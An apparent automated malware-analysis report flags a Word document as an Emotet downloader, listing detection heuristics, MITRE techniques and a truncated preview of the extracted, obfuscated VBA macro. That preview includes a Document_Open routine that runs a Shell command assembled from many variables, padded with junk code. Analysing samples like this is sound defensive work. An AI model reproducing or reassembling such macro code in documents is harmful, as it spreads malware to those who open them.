MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6878773-0. Static analysis detected critical heuristics for VBA macros and the use of the Shell() function, indicating the document is designed to execute arbitrary code. The presence of a Document_Open macro further suggests an automated execution upon opening. These factors strongly point to a downloader or droppper functionality, characteristic of the Emotet family.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6878773-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6878773-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45147 bytes |
SHA-256: 5554df0d3e63dfa79980fc94857f44a90d9e1975fec21cde35f9ca05d0d8777a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WAFpXPOCFcW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function jjqNJQXbLLSUT()
On Error Resume Next
bcZpK = (qBijop - MAQMGw / 92206 * 11477 - (66352 - zEhOaj * YrOiY - iJZhp + NXwYC - uXnWAv))
bEzPk = (UHEIn - cbilK / 63351 * 7233 - (77625 - AidDj * cMEds - NiTwo + dMFvpO - TNFEb))
fIHbT = (Vjkdu - MjYKqX / 54694 * 37807 - (59009 - iSQaV * BBpFB - fIwka + NwGkOj - vnAcz))
jckdiQ = (hKwbB - whDjOG / 88545 * 39858 - (47864 - fiPfI * CrSOf - GYvDZ + jMAzBL - pkpmpW))
End Function
Private Function CMtkcaiTlRfiw()
On Error Resume Next
JWoXzk = (DSmjF - vShkpt / 14249 * 61777 - (55283 - jouszM * WHmYwF - SalAvX + CjsRTm - vRfzhl))
BkcvA = (pqSAbU - osQXFj / 17322 * 33415 - (17021 - wEmUY * qpQBR - CKswb + wwfMUJ - rGKQF))
RZRNp = (LwjrLh - OKfEMC / 77797 * 62059 - (11376 - hlthi * pZKFW - WmnowF + oPjop - OjXiVp))
zLbnHA = (qokntz - wDuJaN / 30507 * 23994 - (61349 - RSdhF * hUHTZD - cbqXV + zpjjo - NlUYlL))
CrFrVQ = (SWzMu - PIGkF / 81950 * 63129 - (9855 - afZHa * HYRUij - tvEBi + QVUHsW - JYPbuX))
End Function
Private Function vbWWLBtruAiu()
On Error Resume Next
tNOsFq = (wIivz - pdsXF / 64349 * 29785 - (55011 - TTRCwA * YAwYG - jBMKB + sOvLO - wqtzE))
LLifSY = (jDSuwP - ELYpR / 60598 * 31500 - (74502 - tiIYT * hjEBa - XhRIw + sWfcmE - QYEirh))
zkzJz = (RWmqup - jiHhU / 95377 * 45125 - (30424 - RwEYCt * BNUwcZ - TwwFbA + mrOnkt - zWkGIQ))
WmYYww = (JkmOTI - janXV / 30832 * 74654 - (18286 - NMRQbl * CKBNPU - jLzaU + cawXiT - VkdUI))
zLoWs = (cGEsOz - FXIdV / 49420 * 44579 - (33936 - zadnk * KvKTC - QuPFP + HpXdHL - nTmWJV))
UNuub = (tGYjh - YFSwqL / 90922 * 60625 - (29496 - RXHCiz * iZwKK - JlHkHH + UiOOpS - tCnIIz))
End Function
Private Sub Document_open()
On Error Resume Next
zqurA = (cKKqzQ - GrswKp / 86044 * 78005 - (88296 - rEmSzk * dKMtQ - HPaQH + smzVqw - aFGYrO))
zuIih = (wOOnl - MiUDu / 12412 * 72379 - (65435 - wwRoqO * mDcuX - wOLBHb + jICdwl - EoTEQN))
fXHQzj = (FFYdlW - DtYoQT / 11783 * 36276 - (70377 - fjAJJL * ViMjDO - DBRBEt + oVmvP - utPiM))
IaoWWA = (XCAKD - pdPUp / 3086 * 66629 - (25930 - DhFYRI * wbjRz - aWwAl + HKSuZ - RzJkjK))
lQjnw = (jHDKwA - tlOCEO / 82099 * 41946 - (83706 - NNtzz * ShTQuu - SdFLNJ + KovlTJ - Nawwwt))
Shell "" + mOJiZmN + spWlikY + CVar("c") + BBsjvTAKSXlUf + EdLHcYFZM + cJBPWsdXBhX + XXizIlA + SscqLlUVJ + tjoLOtazWrf + wiSMFw + vaiXiziVmCw + woSuFiHVm + RmSYlbzB + tNVZUcBN + IhdIha + oSJwvuswSWa + OJdEJuM + OrMEmlpvIWs + VJOPinzj + NBXUh + VYcwKOtEf + JYwsO + icbRN + Cuifkcijkww + wDdMHAZRHf, 0
BJNdzv = (CjuUN - wMWti / 40193 * 63533 - (17445 - CflhC * CQUPqj - fknAY + jOpnFP - upkfv))
FHVUvA = (wDDQid - iJLBUK / 66348 * 79388 - (54194 - SmmEwI * OujfVJ - owRAU + mwjHSP - GLdOQ))
hGirS = (UzTZEW - ihlFi / 92385 * 88941 - (49124 - NsjRt * NjoUsS - YBvhfS + vPiiwb - DfzzD))
End Sub
Private Function QvTRwHIFUKjo()
On Error Resume Next
PwrLnT = (FuMcY - WuwOLs / 74215 * 9713 - (1198 - zwQat * jXNOIQ - cLjaF + wKrcDk - YNnFi))
lKoXtT = (oilniP - tzXIW / 5428 * 52809 - (43534 - JMkAw * nSWbs - jSbjsn + ljFsL - VJQts))
OBiKI = (qnqSQ - WiJiv / 48892 * 56870 - (29065 - kZEUZw * rWZirY - ioRaZ + OvQolp - LfUUP))
XorKE = (BvFGZz - hnEVl / 66335 * 59705 - (32238 - iCnKTN * aVmPp - tHwcM + pQVtba - OGnCP))
jJnJoI = (vBNPC - nEdCPS / 72264 * 61228 - (73332 - GtpRzI * NKIWLj - fUUXUu + BtXUA - HTWczz))
fuNXt = (ROpPJ - GYVCiR / 63805 * 17669 - (3247 - GVMpU * SkIjh - qiwJj + ikVcSY - ACKJnz))
End Function
Private Function VRSqHIzNzGiM()
On Error Resume Next
fqjlf = (rBYDn - JPlHVj / 16264 * 37724 - (50261 - SlczqK * OsBiC - KViUKm + Arvmc - bvmtlv))
iMZGu = (izzwqH - aRmcZq / 30234 * 42241 - (87990 - HpIIl * covmbN - VCazAj + LGfTt - HPciE))
mSQmiw = (WKvVP - UQZwt / 28537 * 79045 - (56950 - AKoPP * NLNhrd - CloPE + tBLJDj
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.